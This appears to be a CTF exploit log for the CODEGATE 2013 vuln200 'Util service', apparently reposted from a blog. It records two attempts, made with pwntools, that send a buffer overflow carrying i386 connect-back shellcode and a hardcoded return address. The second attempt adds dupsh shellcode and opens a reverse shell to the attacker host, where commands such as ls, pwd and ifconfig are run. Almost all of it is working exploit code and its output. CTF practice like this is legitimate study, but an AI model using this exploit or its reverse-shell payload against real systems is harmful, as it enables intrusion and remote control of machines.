======================= try 1 =======================
from pwn import *
r=remote('192.168.1.104',7777)
>>> r=remote('192.168.1.104',7777)
[x] Opening connection to 192.168.1.104 on port 7777
[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104
[+] Opening connection to 192.168.1.104 on port 7777: Done
>>> print(r.recv(1024))
CODEGATE 2013 Util service!
[*] md5
[*] help
[*] base64 encode
[*] base64 decode
[*] quit
>>> r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)).ljust(0xf0, '\x90')+p32(0xbfdf18cc)))
Listener on the attacker's machine:
# strace -f nc -l -p 7777
......
bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1) = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4
......
======================= try 2 =======================
Attacker side:
r.close()
r=remote('192.168.1.104',7777)
print(r.recv(1024))
r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)+shellcraft.i386.linux.dupsh(sock='ebp'))).ljust(0xf0, '\x90')+p32(0xbfdf18cc))
Reverse shell:
# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:24:54:7b:d2:d9
inet addr:192.168.1.104 Bcast:192.168.1.255 Mask:255.255.255.0
......
Original article: http://www.cnblogs.com/scoder/p/5049665.html